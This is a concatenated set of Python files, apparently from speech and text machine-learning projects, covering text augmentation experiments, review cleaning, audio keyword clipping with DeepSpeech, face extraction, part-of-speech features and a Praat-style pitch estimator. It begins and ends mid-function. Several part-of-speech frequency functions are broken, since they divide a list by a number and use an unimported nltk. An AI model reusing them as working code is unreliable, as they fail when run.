train_x, train_y = get_x_y(train_file, num_classes, word2vec_len, input_size, word2vec, percent_dataset)
test_x, test_y = get_x_y(test_file, num_classes, word2vec_len, input_size, word2vec, 1)
#implement early stopping
callbacks = [EarlyStopping(monitor='val_loss', patience=3)]
#train model
model.fit( train_x,
train_y,
epochs=100000,
callbacks=callbacks,
validation_split=0.1,
batch_size=1024,
shuffle=True,
verbose=0)
#model.save('checkpoints/lol')
#model = load_model('checkpoints/lol')
#evaluate model
y_pred = model.predict(test_x)
test_y_cat = one_hot_to_categorical(test_y)
y_pred_cat = one_hot_to_categorical(y_pred)
acc = accuracy_score(test_y_cat, y_pred_cat)
#clean memory???
train_x, train_y = None, None
gc.collect()
#return the accuracy
#print("data with shape:", train_x.shape, train_y.shape, 'train=', train_file, 'test=', test_file, 'with fraction', percent_dataset, 'had acc', acc)
return acc
if __name__ == "__main__":
#get the accuracy at each increment
orig_accs = {dataset:{} for dataset in datasets}
aug_accs = {dataset:{} for dataset in datasets}
writer = open('outputs_f2/' + get_now_str() + '.csv', 'w')
#for each dataset
for i, dataset_folder in enumerate(dataset_folders):
dataset = datasets[i]
num_classes = num_classes_list[i]
input_size = input_size_list[i]
train_orig = dataset_folder + '/train_orig.txt'
train_aug_st = dataset_folder + '/train_aug_st.txt'
test_path = dataset_folder + '/test.txt'
word2vec_pickle = dataset_folder + '/word2vec.p'
word2vec = load_pickle(word2vec_pickle)
for increment in increments:
#calculate augmented accuracy
aug_acc = run_model(train_aug_st, test_path, num_classes, increment)
aug_accs[dataset][increment] = aug_acc
#calculate original accuracy
orig_acc = run_model(train_orig, test_path, num_classes, increment)
orig_accs[dataset][increment] = orig_acc
print(dataset, increment, orig_acc, aug_acc)
writer.write(dataset + ',' + str(increment) + ',' + str(orig_acc) + ',' + str(aug_acc) + '\n')
gc.collect()
print(orig_accs, aug_accs)
```
#### File: eda_nlp/preprocess/cr_clean.py
```python
from utils import *
def retrieve_reviews(line):
reviews = set()
chars = list(line)
for i, char in enumerate(chars):
if char == '[':
if chars[i+1] == '-':
reviews.add(0)
elif chars[i+1] == '+':
reviews.add(1)
reviews = list(reviews)
if len(reviews) == 2:
return -2
elif len(reviews) == 1:
return reviews[0]
else:
return -1
def clean_files(input_files, output_file):
writer = open(output_file, 'w')
for input_file in input_files:
print(input_file)
input_lines = open(input_file, 'r').readlines()
counter = 0
bad_counter = 0
for line in input_lines:
review = retrieve_reviews(line)
if review in {0, 1}:
good_line = get_only_chars(re.sub("([\(\[]).*?([\)\]])", "\g<1>\g<2>", line))
output_line = str(review) + '\t' + good_line
writer.write(output_line + '\n')
counter += 1
elif review == -2:
bad_counter +=1
print(input_file, counter, bad_counter)
writer.close()
if __name__ == '__main__':
input_files = ['all.txt']#['canon_power.txt', 'canon_s1.txt', 'diaper.txt', 'hitachi.txt', 'ipod.txt', 'micromp3.txt', 'nokia6600.txt', 'norton.txt', 'router.txt']
input_files = ['raw/cr/data_new/' + f for f in input_files]
output_file = 'datasets/cr/apex_clean.txt'
clean_files(input_files, output_file)
```
#### File: eda_nlp/preprocess/utils.py
```python
import re
#cleaning up text
def get_only_chars(line):
clean_line = ""
line = line.lower()
line = line.replace(" 's", " is")
line = line.replace("-", " ") #replace hyphens with spaces
line = line.replace("\t", " ")
line = line.replace("\n", " ")
line = line.replace("'", "")
for char in line:
if char in 'qwertyuiopasdfghjklzxcvbnm ':
clean_line += char
else:
clean_line += ' '
clean_line = re.sub(' +',' ',clean_line) #delete extra spaces
print(clean_line)
if clean_line[0] == ' ':
clean_line = clean_line[1:]
return clean_line
```
#### File: cleaning/audio_cleaning/clean_keyword.py
```python
import sys, os, shutil, librosa, uuid
from pyvad import vad, trim, split
import matplotlib.pyplot as plt
import numpy as np
# make sure the right version of numba is installed
os.system('pip3 install numba==0.48')
def transcribe_audiofile(file):
curdir=os.getcwd()
listdir=os.listdir()
deepspeech_dir=os.getcwd()
# download models if not in helper directory
if 'deepspeech-0.7.0-models.pbmm' not in listdir:
os.system('wget https://github.com/mozilla/DeepSpeech/releases/download/v0.7.0/deepspeech-0.7.0-models.pbmm')
if 'deepspeech-0.7.0-models.scorer' not in listdir:
os.system('wget https://github.com/mozilla/DeepSpeech/releases/download/v0.7.0/deepspeech-0.7.0-models.scorer')
# initialize filenames
textfile=file[0:-4]+'.txt'
newaudio=file[0:-4]+'_newaudio.wav'
if deepspeech_dir.endswith('/'):
deepspeech_dir=deepspeech_dir[0:-1]
# go back to main directory
os.chdir(curdir)
# try:
# convert audio file to 16000 Hz mono audio
os.system('ffmpeg -i "%s" -acodec pcm_s16le -ac 1 -ar 16000 "%s" -y'%(file, newaudio))
command='deepspeech --model %s/deepspeech-0.7.0-models.pbmm --scorer %s/deepspeech-0.7.0-models.scorer --audio "%s" >> "%s"'%(deepspeech_dir, deepspeech_dir, newaudio, textfile)
print(command)
os.system(command)
# get transcript
transcript=open(textfile).read().replace('\n','')
# remove temporary files
os.remove(textfile)
os.remove(newaudio)
# except:
# try:
# # remove temporary files
# os.remove(textfile)
# except:
# pass
# try:
# os.remove(newaudio)
# except:
# pass
# transcript=''
return transcript
def clean_keyword(audiofile,keyword):
'''
taken from https://github.com/F-Tag/python-vad/blob/master/example.ipynb
'''
show=False
curdir=os.getcwd()
data, fs = librosa.core.load(audiofile)
time = np.linspace(0, len(data)/fs, len(data))
try:
vact = vad(data, fs, fs_vad = 16000, hop_length = 30, vad_mode=3)
vact = list(vact)
while len(time) > len(vact):
vact.append(0.0)
utterances=list()
for i in range(len(vact)):
try:
if vact[i] != vact[i-1]:
# voice shift
if vact[i] == 1:
start = i
else:
# this means it is end
end = i
utterances.append([start,end])
except:
pass
print(utterances)
vact=np.array(vact)
tempfiles=list()
keptfiles=list()
for i in range(len(utterances)):
trimmed = data[utterances[i][0]:utterances[i][1]]
tempfile = str(uuid.uuid4())+'.wav'
librosa.output.write_wav(tempfile, trimmed, fs)
tempfiles.append(tempfile)
for i in range(len(tempfiles)):
if os.path.getsize(tempfiles[i]) > 20000:
pass
transcript=transcribe_audiofile(tempfiles[i])
print('TRANSCRIPT --> %s'%(transcript))
if transcript == keyword:
keptfiles.append(tempfiles[i])
else:
os.remove(tempfiles[i])
else:
os.remove(tempfiles[i])
except:
print('ERROR - ValueError: When data.type is float, data must be -1.0 <= data <= 1.0.')
os.remove(audiofile)
return keptfiles
```
#### File: cleaning/audio_cleaning/clean_randomsplice.py
```python
import soundfile as sf
import os, ffmpy, random, getpass
def clean_randomsplice(audiofile, desiredlength):
try:
data, samplerate = sf.read(audiofile)
totalframes=len(data)
totalseconds=int(totalframes/samplerate)
startsec=random.randint(0,totalseconds-(desiredlength+1))
endsec=startsec+desiredlength
startframe=samplerate*startsec
endframe=samplerate*endsec
#write file to resave wave file at those frames
newfile='snipped_'+audiofile
sf.write(newfile, data[int(startframe):int(endframe)], samplerate)
os.remove(audiofile)
return [newfile]
except:
print('error, skipping...')
return [audiofile]
```
#### File: cleaning/image_cleaning/clean_extractfaces.py
```python
import cv2, os, time, shutil, math
import skvideo.io, skvideo.motion, skvideo.measure
from moviepy.editor import VideoFileClip
from PIL import Image
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from PIL import Image
def euclidean_distance(a, b):
x1 = a[0]; y1 = a[1]
x2 = b[0]; y2 = b[1]
return math.sqrt(((x2 - x1) * (x2 - x1)) + ((y2 - y1) * (y2 - y1)))
def detectFace(img,face_detector,eye_detector,nose_detector):
faces = face_detector.detectMultiScale(img, 1.3, 5)
#print("found faces: ", len(faces))
if len(faces) > 0:
face = faces[0]
face_x, face_y, face_w, face_h = face
img = img[int(face_y):int(face_y+face_h), int(face_x):int(face_x+face_w)]
img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
return img, img_gray
else:
img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
return img, img_gray
#raise ValueError("No face found in the passed image ")
def alignFace(img_path, face_detector, eye_detector, nose_detector):
img = cv2.imread(img_path)
plt.imshow(img[:, :, ::-1])
plt.show()
img_raw = img.copy()
img, gray_img = detectFace(img,face_detector,eye_detector,nose_detector)
eyes = eye_detector.detectMultiScale(gray_img)
#print("found eyes: ",len(eyes))
if len(eyes) >= 2:
#find the largest 2 eye
base_eyes = eyes[:, 2]
#print(base_eyes)
items = []
for i in range(0, len(base_eyes)):
item = (base_eyes[i], i)
items.append(item)
df = pd.DataFrame(items, columns = ["length", "idx"]).sort_values(by=['length'], ascending=False)
eyes = eyes[df.idx.values[0:2]]
#--------------------
#decide left and right eye
eye_1 = eyes[0]; eye_2 = eyes[1]
if eye_1[0] < eye_2[0]:
left_eye = eye_1
right_eye = eye_2
else:
left_eye = eye_2
right_eye = eye_1
#--------------------
#center of eyes
left_eye_center = (int(left_eye[0] + (left_eye[2] / 2)), int(left_eye[1] + (left_eye[3] / 2)))
left_eye_x = left_eye_center[0]; left_eye_y = left_eye_center[1]
right_eye_center = (int(right_eye[0] + (right_eye[2]/2)), int(right_eye[1] + (right_eye[3]/2)))
right_eye_x = right_eye_center[0]; right_eye_y = right_eye_center[1]
#center_of_eyes = (int((left_eye_x+right_eye_x)/2), int((left_eye_y+right_eye_y)/2))
cv2.circle(img, left_eye_center, 2, (255, 0, 0) , 2)
cv2.circle(img, right_eye_center, 2, (255, 0, 0) , 2)
#cv2.circle(img, center_of_eyes, 2, (255, 0, 0) , 2)
#----------------------
#find rotation direction
if left_eye_y > right_eye_y:
point_3rd = (right_eye_x, left_eye_y)
direction = -1 #rotate same direction to clock
print("rotate to clock direction")
else:
point_3rd = (left_eye_x, right_eye_y)
direction = 1 #rotate inverse direction of clock
print("rotate to inverse clock direction")
#----------------------
cv2.circle(img, point_3rd, 2, (255, 0, 0) , 2)
cv2.line(img,right_eye_center, left_eye_center,(67,67,67),1)
cv2.line(img,left_eye_center, point_3rd,(67,67,67),1)
cv2.line(img,right_eye_center, point_3rd,(67,67,67),1)
a = euclidean_distance(left_eye_center, point_3rd)
b = euclidean_distance(right_eye_center, point_3rd)
c = euclidean_distance(right_eye_center, left_eye_center)
#print("left eye: ", left_eye_center)
#print("right eye: ", right_eye_center)
#print("additional point: ", point_3rd)
#print("triangle lengths: ",a, b, c)
cos_a = (b*b + c*c - a*a)/(2*b*c)
#print("cos(a) = ", cos_a)
angle = np.arccos(cos_a)
#print("angle: ", angle," in radian")
angle = (angle * 180) / math.pi
print("angle: ", angle," in degree")
if direction == -1:
angle = 90 - angle
print("angle: ", angle," in degree")
#--------------------
#rotate image
new_img = Image.fromarray(img_raw)
new_img = np.array(new_img.rotate(direction * angle))
else:
#find the largest 2 ey
new_img = img_raw
return new_img
def capture_video(filename, timesplit):
video=cv2.VideoCapture(0)
fourcc = cv2.VideoWriter_fourcc(*'XVID')
frame_width = int(video.get(3))
frame_height = int(video.get(4))
out = cv2.VideoWriter(filename,cv2.VideoWriter_fourcc('M','J','P','G'), 10, (frame_width,frame_height))
a=0
start=time.time()
while True:
a=a+1
check, frame=video.read()
#print(check)
#print(frame)
gray=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
out.write(frame)
#cv2.imshow("frame",gray)
end=time.time()
if end-start>timesplit:
break
#print(end-start)
print(a)
video.release()
out.release()
cv2.destroyAllWindows()
return filename
def clean_extractfaces(filename,basedir):
# paths
opencv_home = cv2.__file__
folders = opencv_home.split(os.path.sep)[0:-1]
path = folders[0]
for folder in folders[1:]:
path = path + "/" + folder
# other stuff
face_detector_path = path+"/data/haarcascade_frontalface_default.xml"
eye_detector_path = path+"/data/haarcascade_eye.xml"
nose_detector_path = path+"/data/haarcascade_mcs_nose.xml"
if os.path.isfile(face_detector_path) != True:
raise ValueError("Confirm that opencv is installed on your environment! Expected path ",detector_path," violated.")
face_detector = cv2.CascadeClassifier(face_detector_path)
eye_detector = cv2.CascadeClassifier(eye_detector_path)
nose_detector = cv2.CascadeClassifier(nose_detector_path)
# load image file
image_file = filename
alignedFace = alignFace(image_file, face_detector, eye_detector, nose_detector)
gray = cv2.cvtColor(alignedFace, cv2.COLOR_BGR2GRAY)
faces = face_detector.detectMultiScale(gray, 1.3, 5)
increment=0
facenums=0
print(len(faces))
filenames=list()
if len(faces) == 0:
pass
else:
for (x,y,w,h) in faces:
img=alignedFace
cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)
newimg=img[y:y+h,x:x+w]
new_image_file=image_file[0:-4] + '_face_' + str(increment) + '.png'
newimg=cv2.resize(newimg, (100, 100), interpolation=cv2.INTER_LINEAR)
norm_img = np.zeros((100, 100))
norm_img = cv2.normalize(newimg, norm_img, 0, 255, cv2.NORM_MINMAX)
cv2.imwrite(new_image_file, newimg)
filenames.append(new_image_file)
facenums=facenums+1
os.remove(filename)
return filenames
```
#### File: allie/datasets/seed_test.py
```python
import os, shutil
def prev_dir(directory):
g=directory.split('/')
dir_=''
for i in range(len(g)):
if i != len(g)-1:
if i==0:
dir_=dir_+g[i]
else:
dir_=dir_+'/'+g[i]
# print(dir_)
return dir_
listdir=os.listdir()
if 'sample_voice_data' not in listdir:
os.system('git clone <EMAIL>:jim-schwoebel/sample_voice_data.git')
else:
pass
cur_dir=os.getcwd()
base_dir=prev_dir(cur_dir)
train_dir=base_dir+'/train_dir'
try:
shutil.copy(cur_dir+'/sample_voice_data/gender_all.csv',train_dir+'/gender_all.csv')
except:
os.remove(train_dir+'/gender_all.csv')
shutil.copy(cur_dir+'/sample_voice_data/gender_all.csv',train_dir+'/gender_all.csv')
try:
shutil.copytree(cur_dir+'/sample_voice_data/males',train_dir+'/males')
except:
shutil.rmtree(train_dir+'/males')
shutil.copytree(cur_dir+'/sample_voice_data/males',train_dir+'/males')
try:
shutil.copytree(cur_dir+'/sample_voice_data/females',train_dir+'/females')
except:
shutil.rmtree(train_dir+'/females')
shutil.copytree(cur_dir+'/sample_voice_data/females',train_dir+'/females')
```
#### File: helpers/DigiPsych_Prosody/featurize.py
```python
import argparse, json, os, sys
from prosody import Voice_Prosody
import pandas as pd
from datetime import datetime
'''
Featurize Wrapper for grabbing prosody features for audio stored in a folder
'''
def featurize_audio(audiofile,fsize):
df = pd.DataFrame()
vp = Voice_Prosody()
if audiofile.endswith('.wav'):
print('Featurizing:',audiofile)
feat_dict = vp.featurize_audio(audiofile,int(fsize))
features=list(feat_dict.values())[0:-1]
labels=list(feat_dict)[0:-1]
print(features)
print(labels)
return features, labels
```
#### File: helpers/pyAudioLex/noun_freq.py
```python
from nltk.tokenize import word_tokenize
from nltk.tag import pos_tag, map_tag
def noun_freq(s, tokens = None):
if tokens == None:
tokens = word_tokenize(s)
pos = pos_tag(tokens)
nouns = []
for [token, tag] in pos:
part = map_tag('en-ptb', 'universal', tag)
if part == "NOUN":
nouns.append(token)
if len(tokens) == 0:
return float(0)
else:
return float(len(nouns)) / float(len(tokens))
```
#### File: text_features/parts of speech/rbs_freq.py
```python
from nltk.tokenize import word_tokenize
from nltk.tag import pos_tag, map_tag
from collections import Counter
def rp_freq(importtext):
text=word_tokenize(importtext)
tokens=nltk.pos_tag(text)
c=Counter(token for word, token in tokens)
return ['RP']/len(text)
```
#### File: text_features/parts of speech/to_freq.py
```python
from nltk.tokenize import word_tokenize
from nltk.tag import pos_tag, map_tag
from collections import Counter
def to_freq(importtext):
text=word_tokenize(importtext)
tokens=nltk.pos_tag(text)
c=Counter(token for word, token in tokens)
return ['TO']/len(text)
```
#### File: text_features/parts of speech/vbn_freq.py
```python
from nltk.tokenize import word_tokenize
from nltk.tag import pos_tag, map_tag
from collections import Counter
def vbn_freq(importtext):
text=word_tokenize(importtext)
tokens=nltk.pos_tag(text)
c=Counter(token for word, token in tokens)
return ['VBN']/len(text)
```
#### File: text_features/words/polarity.py
```python
import nltk
from nltk import word_tokenize
from textblob import TextBlob
import numpy as np
def polarity(importtext):
text=word_tokenize(importtext)
tokens=nltk.pos_tag(text)
#sentiment polarity of the session
polarity=TextBlob(importtext).sentiment[0]
#sentiment subjectivity of the session
sentiment=TextBlob(importtext).sentiment[1]
#average difference polarity every 3 words
polaritylist=list()
for i in range(0,len(tokens),3):
if i <= len(tokens)-3:
words=text[i]+' '+text[i+1]+' '+text[i+2]
polaritylist.append(TextBlob(words).sentiment[0])
else:
pass
avgpolarity=np.mean(polaritylist)
#std polarity every 3 words
stdpolarity=np.std(polaritylist)
#variance polarity every 3 words
varpolarity=np.var(polaritylist)
return [float(avgpolarity), float(stdpolarity), float(varpolarity)]
```
#### File: text_features/words/word_endings.py
```python
from nltk import word_tokenize
import re
def word_endings(importtext,ending):
text=word_tokenize(importtext)
#number of words ending in 'ed'
words=[w for w in text if re.search(ending+'$', w)]
return [len(words),words]
#test
#print(word_endings('In a blunt warning to the remaining ISIS fighters, Army Command Sgt. Maj. <NAME> said the shrinking band of militants could either surrender to the U.S. military or face death. “ISIS needs to understand that the Joint Force is on orders to annihilate them,” he wrote in a forceful message on Facebook. “So they have two options, should they decide to come up against the United States, our allies and partners: surrender or die!”','s'))
```
#### File: sa/features/signal.py
```python
import numpy as np
import peakutils as pu
def get_F_0( signal, rate, time_step = 0.0, min_pitch = 75, max_pitch = 600,
max_num_cands = 15, silence_thres = .03, voicing_thres = .45,
octave_cost = .01, octave_jump_cost = .35,
voiced_unvoiced_cost = .14, accurate = False, pulse = False ):
"""
Computes median Fundamental Frequency ( :math:`F_0` ).
The fundamental frequency ( :math:`F_0` ) of a signal is the lowest
frequency, or the longest wavelength of a periodic waveform. In the context
of this algorithm, :math:`F_0` is calculated by segmenting a signal into
frames, then for each frame the most likely candidate is chosen from the
lowest possible frequencies to be :math:`F_0`. From all of these values,
the median value is returned. More specifically, the algorithm filters out
frequencies higher than the Nyquist Frequency from the signal, then
segments the signal into frames of at least 3 periods of the minimum
pitch. For each frame, it then calculates the normalized autocorrelation
( :math:`r_a` ), or the correlation of the signal to a delayed copy of
itself. :math:`r_a` is calculated according to Boersma's paper
( referenced below ), which is an improvement of previous methods.
:math:`r_a` is estimated by dividing the autocorrelation of the windowed
signal by the autocorrelation of the window. After :math:`r_a` is
calculated the maxima values of :math:`r_a` are found. These points
correspond to the lag domain, or points in the delayed signal, where the
correlation value has peaked. The higher peaks indicate a stronger
correlation. These points in the lag domain suggest places of wave
repetition and are the candidates for :math:`F_0`. The best candidate for
:math:`F_0` of each frame is picked by a cost function, a function that
compares the cost of transitioning from the best :math:`F_0` of the
previous frame to all possible :math:`F_0's` of the current frame. Once the
path of :math:`F_0's` of least cost has been determined, the median
:math:`F_0` of all voiced frames is returned.
This algorithm is adapted from:
http://www.fon.hum.uva.nl/david/ba_shs/2010/Boersma_Proceedings_1993.pdf
and from:
https://github.com/praat/praat/blob/master/fon/Sound_to_Pitch.cpp
.. note::
It has been shown that depressed and suicidal men speak with a reduced
fundamental frequency range, ( described in:
http://ameriquests.org/index.php/vurj/article/download/2783/1181 ) and
patients responding well to depression treatment show an increase in
their fundamental frequency variability ( described in :
https://www.ncbi.nlm.nih.gov/pmc/articles/PMC3022333/ ). Because
acoustical properties of speech are the earliest and most consistent
indicators of mood disorders, early detection of fundamental frequency
changes could significantly improve recovery time for disorders with
psychomotor symptoms.
Args:
signal ( numpy.ndarray ): This is the signal :math:`F_0` will be calculated from.
rate ( int ): This is the number of samples taken per second.
time_step ( float ): ( optional, default value: 0.0 ) The measurement, in seconds, of time passing between each frame. The smaller the time_step, the more overlap that will occur. If 0 is supplied the degree of oversampling will be equal to four.
min_pitch ( float ): ( optional, default value: 75 ) This is the minimum value to be returned as pitch, which cannot be less than or equal to zero.
max_pitch ( float ): ( optional, default value: 600 ) This is the maximum value to be returned as pitch, which cannot be greater than the Nyquist Frequency.
max_num_cands ( int ): ( optional, default value: 15 ) This is the maximum number of candidates to be considered for each frame, the unvoiced candidate ( i.e. :math:`F_0` equal to zero ) is always considered.
silence_thres ( float ): ( optional, default value: 0.03 ) Frames that do not contain amplitudes above this threshold ( relative to the global maximum amplitude ), are probably silent.
voicing_thres ( float ): ( optional, default value: 0.45 ) This is the strength of the unvoiced candidate, relative to the maximum possible :math:`r_a`. To increase the number of unvoiced decisions, increase this value.
octave_cost ( float ): ( optional, default value: 0.01 per octave ) This is the degree of favouring of high-frequency candidates, relative to the maximum possible :math:`r_a`. This is necessary because in the case of a perfectly periodic signal, all undertones of :math:`F_0` are equally strong candidates as :math:`F_0` itself. To more strongly favour recruitment of high-frequency candidates, increase this value.
octave_jump_cost ( float ): ( optional, default value: 0.35 ) This is degree of disfavouring of pitch changes, relative to the maximum possible :math:`r_a`. To decrease the number of large frequency jumps, increase this value.
voiced_unvoiced_cost ( float ): ( optional, default value: 0.14 ) This is the degree of disfavouring of voiced/unvoiced transitions, relative to the maximum possible :math:`r_a`. To decrease the number of voiced/unvoiced transitions, increase this value.
accurate ( bool ): ( optional, default value: False ) If False, the window is a Hanning window with a length of :math:`\\frac{ 3.0} {min\_pitch}`. If True, the window is a Gaussian window with a length of :math:`\\frac{6.0}{min\_pitch}`, i.e. twice the length.
pulse ( bool ): ( optional, default value: False ) If False, the function returns a list containing only the median :math:`F_0`. If True, the function returns a list with all values necessary to calculate pulses. This list contains the median :math:`F_0`, the frequencies for each frame in a list, a list of tuples containing the beginning time of the frame, and the ending time of the frame, and the signal filtered by the Nyquist Frequency. The indicies in the second and third list correspond to each other.
Returns:
list: Index 0 contains the median :math:`F_0` in hz. If pulse is set
equal to True, indicies 1, 2, and 3 will contain: a list of all voiced
periods in order, a list of tuples of the beginning and ending time
of a voiced interval, with each index in the list corresponding to the
previous list, and a numpy.ndarray of the signal filtered by the
Nyquist Frequency. If pulse is set equal to False, or left to the
default value, then the list will only contain the median :math:`F_0`.
Raises:
ValueError: min_pitch has to be greater than zero.
ValueError: octave_cost isn't in [ 0, 1 ].
ValueError: silence_thres isn't in [ 0, 1 ].
ValueError: voicing_thres isn't in [ 0, 1 ].
ValueError: max_pitch can't be larger than Nyquist Frequency.
Example:
The example below demonstrates what different outputs this function
gives, using a synthesized signal.
>>> import numpy as np
>>> from matplotlib import pyplot as plt
>>> domain = np.linspace( 0, 6, 300000 )
>>> rate = 50000
>>> y = lambda x: np.sin( 2 * np.pi * 140 * x )
>>> signal = y( domain )
>>> get_F_0( signal, rate )
[ 139.70588235294116 ]
>>> get_F_0( signal, rate, voicing_threshold = .99, accurate = True )
[ 139.70588235294116 ]
>>> w, x, y, z = get_F_0( signal, rate, pulse = True )
>>> print( w )
139.70588235294116
>>> print( x[ :5 ] )
[ 0.00715789 0.00715789 0.00715789 0.00715789 0.00715789 ]
>>> print( y[ :5 ] )
[ ( 0.002500008333361111, 0.037500125000416669 ),
( 0.012500041666805555, 0.047500158333861113 ),
( 0.022500075000249999, 0.057500191667305557 ),
( 0.032500108333694447, 0.067500225000749994 ),
( 0.042500141667138891, 0.077500258334194452 ) ]
>>> print( z[ : 5 ] )
[ 0. 0.01759207 0.0351787 0.05275443 0.07031384 ]
The example below demonstrates the algorithms ability to adjust for
signals with dynamic frequencies, by comparing a plot of a synthesized
signal with an increasing frequency, and the calculated frequencies for
that signal.
>>> domain = np.linspace( 1, 2, 10000 )
>>> rate = 10000
>>> y = lambda x : np.sin( x ** 8 )
>>> signal = y( domain )
>>> median_F_0, periods, time_vals, modified_sig = get_F_0( signal,
rate, pulse = True )
>>> plt.subplot( 211 )
>>> plt.plot( domain, signal )
>>> plt.title( "Synthesized Signal" )
>>> plt.ylabel( "Amplitude" )
>>> plt.subplot( 212 )
>>> plt.plot( np.linspace( 1, 2, len( periods ) ), 1.0 / np.array(
periods ) )
>>> plt.title( "Frequencies of Signal" )
>>> plt.xlabel( "Samples" )
>>> plt.ylabel( "Frequency" )
>>> plt.suptitle( "Comparison of Synthesized Signal and it's Calculated Frequencies" )
>>> plt.show()
.. figure:: figures/F_0_synthesized_sig.png
:align: center
"""
if min_pitch <= 0:
raise ValueError( "min_pitch has to be greater than zero." )
if max_num_cands < max_pitch / min_pitch:
max_num_cands = int( max_pitch / min_pitch )
initial_len = len( signal )
total_time = initial_len / float( rate )
tot_time_arr = np.linspace( 0, total_time, initial_len )
max_place_poss = 1.0 / min_pitch
min_place_poss = 1.0 / max_pitch
#to silence formants
min_place_poss2 = 0.5 / max_pitch
if accurate: pds_per_window = 6.0
else: pds_per_window = 3.0
#degree of oversampling is 4
if time_step <= 0: time_step = ( pds_per_window / 4.0 ) / min_pitch
w_len = pds_per_window / min_pitch
#correcting for time_step
octave_jump_cost *= .01 / time_step
voiced_unvoiced_cost *= .01 / time_step
Nyquist_Frequency = rate / 2.0
upper_bound = .95 * Nyquist_Frequency
zeros_pad = 2 ** ( int( np.log2( initial_len ) ) + 1 ) - initial_len
signal = np.hstack( ( signal, np.zeros( zeros_pad ) ) )
fft_signal = np.fft.fft( signal )
fft_signal[ int( upper_bound ) : -int( upper_bound ) ] = 0
sig = np.fft.ifft( fft_signal )
sig = sig[ :initial_len ].real
#checking to make sure values are valid
if Nyquist_Frequency < max_pitch:
raise ValueError( "max_pitch can't be larger than Nyquist Frequency." )
if octave_cost < 0 or octave_cost > 1:
raise ValueError( "octave_cost isn't in [ 0, 1 ]" )
if voicing_thres< 0 or voicing_thres > 1:
raise ValueError( "voicing_thres isn't in [ 0, 1 ]" )
if silence_thres < 0 or silence_thres > 1:
raise ValueError( "silence_thres isn't in [ 0, 1 ]" )
#finding number of samples per frame and time_step
frame_len = int( w_len * rate + .5 )
time_len = int( time_step * rate + .5 )
#initializing list of candidates for F_0, and their strengths
best_cands, strengths, time_vals = [], [], []
#finding the global peak the way Praat does
global_peak = max( abs( sig - sig.mean() ) )
print(type(global_peak),'\n')
e = np.e
inf = np.inf
log = np.log2
start_i = 0
while start_i < len( sig ) - frame_len :
end_i = start_i + frame_len
segment = sig[ start_i : end_i ]
if accurate:
t = np.linspace( 0, w_len, len( segment ) )
numerator = e ** ( -12.0 * ( t / w_len - .5 ) ** 2.0 ) - e ** -12.0
denominator = 1.0 - e ** -12.0
window = numerator / denominator
interpolation_depth = 0.25
else:
window = np.hanning( len( segment ) )
interpolation_depth = 0.50
#shave off ends of time intervals to account for overlapping
start_time = tot_time_arr[ start_i + int( time_len / 4.0 ) ]
stop_time = tot_time_arr[ end_i - int( time_len / 4.0 ) ]
time_vals.append( ( start_time, stop_time ) )
start_i += time_len
long_pd_i = int( rate / min_pitch )
half_pd_i = int( long_pd_i / 2.0 + 1 )
long_pd_cushion = segment[ half_pd_i : - half_pd_i ]
#finding local peak and local mean the way Praat does
#local mean is found by looking a longest period to either side of the
#center of the frame, and using only the values within this interval to
#calculate the local mean, and similarly local peak is found by looking
#a half of the longest period to either side of the center of the
#frame, ( after the frame has windowed ) and choosing the absolute
#maximum in this interval
local_mean = long_pd_cushion.mean()
segment = segment - local_mean
segment *= window
half_pd_cushion = segment[ long_pd_i : -long_pd_i ]
local_peak = max( abs( half_pd_cushion ) )
if local_peak == 0:
#shortcut -> complete silence and only candidate is silent candidate
best_cands.append( [ inf ] )
strengths.append( [ voicing_thres + 2 ] )
else:
#calculating autocorrelation, based off steps 3.2-3.10
intensity = local_peak / float( global_peak )
N = len( segment )
nFFT = 2 ** int( log( ( 1.0 + interpolation_depth ) * N ) + 1 )
window = np.hstack( ( window, np.zeros( nFFT - N ) ) )
segment = np.hstack( ( segment, np.zeros( nFFT - N ) ) )
x_fft = np.fft.fft( segment )
r_a = np.real( np.fft.fft( x_fft * np.conjugate( x_fft ) ) )
r_a = r_a[ : int( N / pds_per_window ) ]
x_fft = np.fft.fft( window )
r_w = np.real( np.fft.fft( x_fft * np.conjugate( x_fft ) ) )
r_w = r_w[ : int( N / pds_per_window ) ]
r_x = r_a / r_w
r_x /= r_x[ 0 ]
#creating an array of the points in time corresponding to sampled
#autocorrelation of the signal ( r_x )
time_array = np.linspace( 0 , w_len / pds_per_window, len( r_x ) )
peaks = pu.indexes( r_x , thres = 0 )
max_values, max_places = r_x[ peaks ], time_array[ peaks ]
#only consider places that are voiced over a certain threshold
max_places = max_places[ max_values > 0.5 * voicing_thres ]
max_values = max_values[ max_values > 0.5 * voicing_thres ]
for i in range( len( max_values ) ):
#reflecting values > 1 through 1.
if max_values[ i ] > 1.0 :
max_values[ i ] = 1.0 / max_values[ i ]
#calculating the relative strength value
rel_val = [ val - octave_cost * log( place * min_pitch ) for
val, place in zip( max_values, max_places ) ]
if len( max_values ) > 0.0 :
#finding the max_num_cands-1 maximizers, and maximums, then
#calculating their strengths ( eq. 23 and 24 ) and accounting for
#silent candidate
max_places = [ max_places[ i ] for i in np.argsort( rel_val )[
-max_num_cands + 1 : ] ]
max_values = [ max_values[ i ] for i in np.argsort( rel_val )[
-max_num_cands + 1 : ] ]
max_places = np.array( max_places )
max_values = np.array( max_values )
rel_val = list(np.sort( rel_val )[ -max_num_cands + 1 : ] )
#adding the silent candidate's strength to strengths
rel_val.append( voicing_thres + max( 0, 2 - ( intensity /
( silence_thres / ( 1 + voicing_thres ) ) ) ) )
#inf is our silent candidate
max_places = np.hstack( ( max_places, inf ) )
best_cands.append( list( max_places ) )
strengths.append( rel_val )
else:
#if there are no available maximums, only account for silent
#candidate
best_cands.append( [ inf ] )
strengths.append( [ voicing_thres + max( 0, 2 - intensity /
( silence_thres / ( 1 + voicing_thres ) ) ) ] )
#Calculates smallest costing path through list of candidates ( forwards ),
#and returns path.
best_total_cost, best_total_path = -inf, []
#for each initial candidate find the path of least cost, then of those
#paths, choose the one with the least cost.
for cand in range( len( best_cands[ 0 ] ) ):
start_val = best_cands[ 0 ][ cand ]
total_path = [ start_val ]
level = 1
prev_delta = strengths[ 0 ][ cand ]
maximum = -inf
while level < len( best_cands ) :
prev_val = total_path[ -1 ]
best_val = inf
for j in range( len( best_cands[ level ] ) ):
cur_val = best_cands[ level ][ j ]
cur_delta = strengths[ level ][ j ]
